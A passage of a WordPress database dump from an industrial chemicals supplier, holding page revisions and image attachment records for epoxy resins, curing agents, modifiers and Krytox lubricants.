effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1624"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-21 13:28:26', '2016-09-21 13:28:26', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1875, 2, '2016-09-21 13:56:31', '2016-09-21 13:56:31', 'Miller-Stephenson brand specialty products consist of the AeroDuster®, Penetrating Oil, Rust Inhibitor and the Quik-Freeze®. \n\n[product_categories number="2" ids="10,94" columns="4" title="Specialty Products &amp; Solvents"]', 'Specialty Products & Solvents', '', 'inherit', 'closed', 'closed', '', '1871-autosave-v1', '', '', '2016-09-21 13:56:31', '2016-09-21 13:56:31', '', 1871, 'https://132.148.10.86/wordpress/1871-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1876, 2, '2016-09-21 14:30:47', '2016-09-21 14:30:47', '', 'epikure-3125', '', 'inherit', 'open', 'closed', '', 'epikure-3125-2', '', '', '2016-09-21 14:30:47', '2016-09-21 14:30:47', '', 1866, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/EPIKURE-3125.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1877, 2, '2016-09-21 14:31:44', '2016-09-21 14:31:44', '', 'Epikure 3140 Curing agent', '', 'inherit', 'open', 'closed', '', 'epikure-3140-2', '', '', '2016-11-23 19:44:09', '2016-11-23 19:44:09', '', 1868, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/EPIKURE-3140.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1878, 2, '2016-09-21 14:32:32', '2016-09-21 14:32:32', '', 'epikure-3223', '', 'inherit', 'open', 'closed', '', 'epikure-3223-2', '', '', '2016-09-21 14:32:32', '2016-09-21 14:32:32', '', 1183, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/EPIKURE-3223.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1879, 2, '2016-09-21 14:33:36', '2016-09-21 14:33:36', '', 'epikure-3234', '', 'inherit', 'open', 'closed', '', 'epikure-3234-2', '', '', '2016-09-21 14:33:36', '2016-09-21 14:33:36', '', 1185, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/EPIKURE-3234.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1880, 2, '2016-09-21 14:34:47', '2016-09-21 14:34:47', '', 'EPIKURE 3245 Epoxy Curing Agent', '', 'inherit', 'open', 'closed', '', 'epikure-3245-2', '', '', '2016-11-23 19:41:08', '2016-11-23 19:41:08', '', 1187, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/EPIKURE-3245.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1881, 2, '2016-09-21 14:35:39', '2016-09-21 14:35:39', '', 'epikure-3271', '', 'inherit', 'open', 'closed', '', 'epikure-3271-2', '', '', '2016-09-21 14:35:39', '2016-09-21 14:35:39', '', 1189, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/EPIKURE-3271.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1882, 2, '2016-09-21 14:36:38', '2016-09-21 14:36:38', 'EPIKURE 3282 Curing Agent', 'EPIKURE 3282 Curing Agent', 'EPIKURE 3282 Curing Agent', 'inherit', 'open', 'closed', '', 'epikure-3282-2', '', '', '2016-11-17 16:21:59', '2016-11-17 16:21:59', '', 1193, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/EPIKURE-3282.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1883, 2, '2016-09-21 14:37:19', '2016-09-21 14:37:19', '', 'EPIKURE™ 3282', 'EPIKURE™ Curing Agent 3282, a very reactive modified aliphatic amine adduct, has been developed for applications where relatively short cure periods at room temperature are required. EPIKURE Curing Agent 3282 is normally used at a weight ratio of 20 parts per 100 parts of liquid epoxym resin. Thin sections, where exothermic heat is readily dissipated, require 4 to 8 hours for the composition to cure to handling strength. The composition reaches full cure after 4 to 7 days.', 'inherit', 'closed', 'closed', '', '1193-autosave-v1', '', '', '2016-09-21 14:37:19', '2016-09-21 14:37:19', '', 1193, 'https://132.148.10.86/wordpress/1193-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1884, 2, '2016-09-21 14:38:03', '2016-09-21 14:38:03', '', 'epikure-3290', '', 'inherit', 'open', 'closed', '', 'epikure-3290-2', '', '', '2016-09-21 14:38:03', '2016-09-21 14:38:03', '', 1198, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/EPIKURE-3290.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1885, 2, '2016-09-21 14:38:51', '2016-09-21 14:38:51', '', 'epikure-3370', '', 'inherit', 'open', 'closed', '', 'epikure-3370-2', '', '', '2016-09-21 14:38:51', '2016-09-21 14:38:51', '', 1061, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIKURE-3370.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1886, 2, '2016-09-21 14:40:20', '2016-09-21 14:40:20', '', 'epin-58034', '', 'inherit', 'open', 'closed', '', 'epin-58034', '', '', '2016-09-21 14:40:20', '2016-09-21 14:40:20', '', 994, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIN-58034.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1887, 2, '2016-09-21 14:41:52', '2016-09-21 14:41:52', '', 'EPIKURE W Curing Agent', '', 'inherit', 'open', 'closed', '', 'epikure-w-2', '', '', '2016-11-23 19:46:54', '2016-11-23 19:46:54', '', 1059, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIKURE-W-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1888, 2, '2016-09-21 14:42:59', '2016-09-21 14:42:59', '', 'epon-813', '', 'inherit', 'open', 'closed', '', 'epon-813-2', '', '', '2016-09-21 14:42:59', '2016-09-21 14:42:59', '', 903, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-813.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1889, 2, '2016-09-21 14:43:50', '2016-09-21 14:43:50', '', 'EPON Resin 815C Epon 815C', '', 'inherit', 'open', 'closed', '', 'epon-815c-2', '', '', '2016-11-23 19:25:52', '2016-11-23 19:25:52', '', 910, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-815C.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1890, 2, '2016-09-21 14:44:49', '2016-09-21 14:44:49', 'EPON 825 EPON Resin 825', 'EPON 825 EPON Resin 825', '', 'inherit', 'open', 'closed', '', 'epon-825-2', '', '', '2016-10-31 15:37:03', '2016-10-31 15:37:03', '', 842, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-825.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1891, 3, '2016-09-21 14:44:56', '2016-09-21 14:44:56', 'specialty product', 'specialty-products-2', '', 'inherit', 'open', 'closed', '', 'specialty-products-2', '', '', '2016-09-21 14:46:14', '2016-09-21 14:46:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Specialty-Products-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1892, 2, '2016-09-21 14:45:47', '2016-09-21 14:45:47', '', 'epikure-3223', '', 'inherit', 'open', 'closed', '', 'epikure-3223-3', '', '', '2016-09-21 14:45:47', '2016-09-21 14:45:47', '', 861, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIKURE-3223.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1893, 2, '2016-09-21 14:46:50', '2016-09-21 14:46:50', '', 'Epon 828 Difunctional Liquid Epoxy Resin', '', 'inherit', 'open', 'closed', '', 'epon-828-2', '', '', '2016-11-23 19:36:55', '2016-11-23 19:36:55', '', 877, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-828.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1894, 2, '2016-09-21 14:47:38', '2016-09-21 14:47:38', '', 'Epon 830', '', 'inherit', 'open', 'closed', '', 'epon-830-2', '', '', '2016-11-23 19:34:02', '2016-11-23 19:34:02', '', 882, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-830.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1895, 2, '2016-09-21 14:49:13', '2016-09-21 14:49:13', '', 'epon-834', '', 'inherit', 'open', 'closed', '', 'epon-834-2', '', '', '2016-09-21 14:49:13', '2016-09-21 14:49:13', '', 885, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-834.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1896, 2, '2016-09-21 14:50:05', '2016-09-21 14:50:05', '', 'EPON 862 EPON Resin 862', '', 'inherit', 'open', 'closed', '', 'epon-862-2', '', '', '2016-11-23 19:33:02', '2016-11-23 19:33:02', '', 887, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-862.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1897, 2, '2016-09-21 14:50:53', '2016-09-21 14:50:53', '', 'epon-872', '', 'inherit', 'open', 'closed', '', 'epon-872-2', '', '', '2016-09-21 14:50:53', '2016-09-21 14:50:53', '', 900, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-872.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1898, 2, '2016-09-21 14:51:48', '2016-09-21 14:51:48', '', 'epon-1002f', '', 'inherit', 'open', 'closed', '', 'epon-1002f-2', '', '', '2016-09-21 14:51:48', '2016-09-21 14:51:48', '', 937, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-1002F.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1899, 2, '2016-09-21 14:52:44', '2016-09-21 14:52:44', '', 'epon-1004f', '', 'inherit', 'open', 'closed', '', 'epon-1004f-2', '', '', '2016-09-21 14:52:44', '2016-09-21 14:52:44', '', 939, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-1004F.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1900, 2, '2016-09-21 14:53:50', '2016-09-21 14:53:50', '', 'epon-1007f', '', 'inherit', 'open', 'closed', '', 'epon-1007f-2', '', '', '2016-09-21 14:53:50', '2016-09-21 14:53:50', '', 941, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-1007F.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1901, 2, '2016-09-21 14:54:48', '2016-09-21 14:54:48', '', 'epon-1031', '', 'inherit', 'open', 'closed', '', 'epon-1031-2', '', '', '2016-09-21 14:54:48', '2016-09-21 14:54:48', '', 948, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-1031.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1902, 2, '2016-09-21 14:58:21', '2016-09-21 14:58:21', '', 'epon-8021', '', 'inherit', 'open', 'closed', '', 'epon-8021-2', '', '', '2016-09-21 14:58:21', '2016-09-21 14:58:21', '', 970, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-8021.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1903, 2, '2016-09-21 14:59:16', '2016-09-21 14:59:16', '', 'epon-8132', '', 'inherit', 'open', 'closed', '', 'epon-8132-2', '', '', '2016-09-21 14:59:16', '2016-09-21 14:59:16', '', 912, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-8132.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1904, 2, '2016-09-21 15:00:09', '2016-09-21 15:00:09', '', 'EPON 8280', '', 'inherit', 'open', 'closed', '', 'epon-8280-2', '', '', '2016-11-23 19:31:06', '2016-11-23 19:31:06', '', 891, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-8280.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1905, 3, '2016-09-21 15:00:14', '2016-09-21 15:00:14', '', 'epoxy-resin-sytems', '', 'inherit', 'open', 'closed', '', 'epoxy-resin-sytems', '', '', '2016-09-21 15:00:14', '2016-09-21 15:00:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/epoxy-resin-sytems.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1906, 2, '2016-09-21 15:01:16', '2016-09-21 15:01:16', '', 'epon-8281', '', 'inherit', 'open', 'closed', '', 'epon-8281-2', '', '', '2016-09-21 15:01:16', '2016-09-21 15:01:16', '', 895, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-8281.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1907, 2, '2016-09-21 15:02:03', '2016-09-21 15:02:03', '', 'epon-58005', '', 'inherit', 'open', 'closed', '', 'epon-58005-2', '', '', '2016-09-21 15:02:03', '2016-09-21 15:02:03', '', 977, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-58005.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1908, 2, '2016-09-21 15:02:56', '2016-09-21 15:02:56', '', 'epon-su-8', '', 'inherit', 'open', 'closed', '', 'epon-su-8-2', '', '', '2016-09-21 15:02:56', '2016-09-21 15:02:56', '', 952, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-SU-8.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1909, 2, '2016-09-21 15:04:15', '2016-09-21 15:04:15', '', 'heloxy-48', '', 'inherit', 'open', 'closed', '', 'heloxy-48-2', '', '', '2016-09-21 15:04:15', '2016-09-21 15:04:15', '', 1221, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/HELOXY-48.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1910, 2, '2016-09-21 15:05:21', '2016-09-21 15:05:21', 'HELOXY 61  Epoxy Resin Modifier', 'HELOXY 61  Epoxy Resin Modifier', 'HELOXY 61  Epoxy Resin Modifier', 'inherit', 'open', 'closed', '', 'heloxy-61-2', '', '', '2016-11-07 20:16:38', '2016-11-07 20:16:38', '', 1069, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/HELOXY-61.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1911, 2, '2016-09-21 15:06:14', '2016-09-21 15:06:14', '', 'heloxy-62', '', 'inherit', 'open', 'closed', '', 'heloxy-62-2', '', '', '2016-09-21 15:06:14', '2016-09-21 15:06:14', '', 1216, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/HELOXY-62.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1912, 2, '2016-09-21 15:07:30', '2016-09-21 15:07:30', '', 'heloxy-68', '', 'inherit', 'open', 'closed', '', 'heloxy-68-2', '', '', '2016-09-21 15:07:30', '2016-09-21 15:07:30', '', 1224, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/HELOXY-68.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1913, 3, '2016-09-21 15:08:05', '2016-09-21 15:08:05', '', 'krytox-and-lubricants', '', 'inherit', 'open', 'closed', '', 'krytox-and-lubricants', '', '', '2016-09-21 15:08:05', '2016-09-21 15:08:05', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-and-lubricants.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1914, 2, '2016-09-21 15:08:35', '2016-09-21 15:08:35', '', 'HELOXY 71 Heloxy Modifier 71', '', 'inherit', 'open', 'closed', '', 'heloxy-71-2', '', '', '2016-11-24 20:45:34', '2016-11-24 20:45:34', '', 1230, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/HELOXY-71.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1915, 2, '2016-09-21 15:10:13', '2016-09-21 15:10:13', '', 'HELOXY 107 HELOXY Modifier 107', '', 'inherit', 'open', 'closed', '', 'heloxy-107-2', '', '', '2016-11-24 20:48:03', '2016-11-24 20:48:03', '', 1227, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/HELOXY-107.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1916, 3, '2016-09-21 15:11:32', '2016-09-21 15:11:32', '', 'shutterstock_90113479', '', 'inherit', 'open', 'closed', '', 'shutterstock_90113479', '', '', '2016-09-21 15:11:32', '2016-09-21 15:11:32', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/shutterstock_90113479.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1917, 2, '2016-09-21 15:13:31', '2016-09-21 15:13:31', '', 'heloxy-116', '', 'inherit', 'open', 'closed', '', 'heloxy-116-2', '', '', '2016-09-21 15:13:31', '2016-09-21 15:13:31', '', 1212, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/HELOXY-116.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1918, 2, '2016-09-21 15:16:32', '2016-09-21 15:16:32', '', 'heloxy-505', '', 'inherit', 'open', 'closed', '', 'heloxy-505-2', '', '', '2016-09-21 15:16:32', '2016-09-21 15:16:32', '', 1270, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/HELOXY-505.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1919, 3, '2016-09-21 15:16:38', '2016-09-21 15:16:38', '', 'shutterstock_146691971', '', 'inherit', 'open', 'closed', '', 'shutterstock_146691971', '', '', '2016-09-21 15:16:38', '2016-09-21 15:16:38', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/shutterstock_146691971.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1920, 2, '2016-09-21 15:18:26', '2016-09-21 15:18:26', '', 'Epoxy Stripping Agent MS-111', '', 'inherit', 'open', 'closed', '', 'ms-111-epoxy-stripping', '', '', '2016-11-24 04:03:33', '2016-11-24 04:03:33', '', 1152, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1921, 3, '2016-09-21 15:21:43', '2016-09-21 15:21:43', '', 'release-agents-products', '', 'inherit', 'open', 'closed', '', 'release-agents-products', '', '', '2016-09-21 15:21:43', '2016-09-21 15:21:43', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/release-agents-products.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1922, 3, '2016-09-21 15:24:38', '2016-09-21 15:24:38', '', 'specialty-products-3', '', 'inherit', 'open', 'closed', '', 'specialty-products-3', '', '', '2016-09-21 15:24:38', '2016-09-21 15:24:38', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/specialty-products-3.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1923, 3, '2016-09-21 15:26:05', '2016-09-21 15:26:05', '', 'vazo-radical-intiator-2', '', 'inherit', 'open', 'closed', '', 'vazo-radical-intiator-2', '', '', '2016-09-21 15:26:05', '2016-09-21 15:26:05', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Vazo-radical-intiator-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1924, 2, '2016-09-21 15:30:03', '2016-09-21 15:30:03', '', 'Epon 1001F', '', 'inherit', 'open', 'closed', '', 'epon-resin-2', '', '', '2016-11-23 19:24:06', '2016-11-23 19:24:06', '', 986, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-RESIN-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1925, 2, '2016-09-21 15:30:25', '2016-09-21 15:30:25', '', 'epikure', '', 'inherit', 'open', 'closed', '', 'epikure-2', '', '', '2016-09-21 15:30:25', '2016-09-21 15:30:25', '', 986, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIKURE-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1926, 2, '2016-09-21 15:32:55', '2016-09-21 15:32:55', '', 'Krytox Lubricants', '', 'inherit', 'open', 'closed', '', 'krytox-other-grease-oil-2', '', '', '2016-09-29 13:54:57', '2016-09-29 13:54:57', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-other-grease-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1927, 3, '2016-09-21 15:33:39', '2016-09-21 15:33:39', 'ReleaSys semi-permanent mold release', 'releasys-semi-permanent-mold-release', '', 'inherit', 'open', 'closed', '', 'releasys-semi-permanent-mold-release-2', '', '', '2016-09-21 15:33:52', '2016-09-21 15:33:52', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ReleaSys-semi-permanent-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1928, 2, '2016-09-21 15:34:23', '2016-09-21 15:34:23', '', 'krytox-fpg-028', '', 'inherit', 'open', 'closed', '', 'krytox-fpg-028-2', '', '', '2016-09-21 15:34:23', '2016-09-21 15:34:23', '', 984, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-fpg-028-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1929, 2, '2016-09-21 15:34:36', '2016-09-21 15:34:36', '', 'krytox-fpg-128', '', 'inherit', 'open', 'closed', '', 'krytox-fpg-128-2', '', '', '2016-09-21 15:34:36', '2016-09-21 15:34:36', '', 984, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-fpg-128-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1930, 2, '2016-09-21 15:34:48', '2016-09-21 15:34:48', '', 'krytox-fpg-grease', '', 'inherit', 'open', 'closed', '', 'krytox-fpg-grease-2', '', '', '2016-09-21 15:34:48', '2016-09-21 15:34:48', '', 984, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-fpg-grease-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1931, 3, '2016-09-21 15:34:52', '2016-09-21 15:34:52', 'Boron nitride', 'boron-nitride', '', 'inherit', 'open', 'closed', '', 'boron-nitride-2', '', '', '2016-09-21 15:35:04', '2016-09-21 15:35:04', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Boron-nitride.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1932, 2, '2016-09-21 15:39:23', '2016-09-21 15:39:23', '', 'krytox-electronic-grease', '', 'inherit', 'open', 'closed', '', 'krytox-electronic-grease-2', '', '', '2016-09-21 15:39:23', '2016-09-21 15:39:23', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Krytox-electronic-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1933, 2, '2016-09-21 15:39:42', '2016-09-21 15:39:42', '', 'krytox-electronic-grease-electric', '', 'inherit', 'open', 'closed', '', 'krytox-electronic-grease-electric-2', '', '', '2016-09-21 15:39:42', '2016-09-21 15:39:42', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-electronic-grease-electric.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1934, 2, '2016-09-21 15:39:54', '2016-09-21 15:39:54', '', 'krytox-eg-grease', '', 'inherit', 'open', 'closed', '', 'krytox-eg-grease-2', '', '', '2016-09-21 15:39:54', '2016-09-21 15:39:54', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-eg-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1935, 3, '2016-09-21 15:39:58', '2016-09-21 15:39:58', 'Release Agents ', 'Release Agents', '', 'inherit', 'open', 'closed', '', 'shutterstock_270175811', '', '', '2016-10-06 19:28:46', '2016-10-06 19:28:46', '', 425, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_270175811.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1936, 2, '2016-09-21 15:42:06', '2016-09-21 15:42:06', '', 'krytox-aerospace-grease-oil', '', 'inherit', 'open', 'closed', '', 'krytox-aerospace-grease-oil', '', '', '2016-09-21 15:42:06', '2016-09-21 15:42:06', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-aerospace-grease-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1937, 2, '2016-09-21 15:43:02', '2016-09-21 15:43:02', '', 'krytox-gpl-grease-oil', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-grease-oil', '', '', '2016-09-21 15:43:02', '2016-09-21 15:43:02', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-gpl-grease-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1938, 2, '2016-09-21 15:44:04', '2016-09-21 15:44:04', '', 'krytox-xht-grease-oil', '', 'inherit', 'open', 'closed', '', 'krytox-xht-grease-oil', '', '', '2016-09-21 15:44:04', '2016-09-21 15:44:04', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-xht-grease-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1939, 2, '2016-09-21 15:45:20', '2016-09-21 15:45:20', '', 'krytox-nrt-grease', '', 'inherit', 'open', 'closed', '', 'krytox-nrt-grease', '', '', '2016-09-21 15:45:20', '2016-09-21 15:45:20', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-nrt-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1940, 3, '2016-09-21 15:45:23', '2016-09-21 15:45:23', '', 'shutterstock_97401731', '', 'inherit', 'open', 'closed', '', 'shutterstock_97401731-2', '', '', '2016-09-21 15:45:23', '2016-09-21 15:45:23', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/shutterstock_97401731.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1941, 3, '2016-09-21 15:47:18', '2016-09-21 15:47:18', '', 'silicone-coating', '', 'inherit', 'open', 'closed', '', 'silicone-coating', '', '', '2016-09-21 15:47:18', '2016-09-21 15:47:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/silicone-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1942, 3, '2016-09-21 15:48:23', '2016-09-21 15:48:23', '', 'urethane-missle', '', 'inherit', 'open', 'closed', '', 'urethane-missle-2', '', '', '2016-09-21 15:48:23', '2016-09-21 15:48:23', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Urethane-Missle.jpg', 0, 'attachment', 'image/jpeg', 0); 
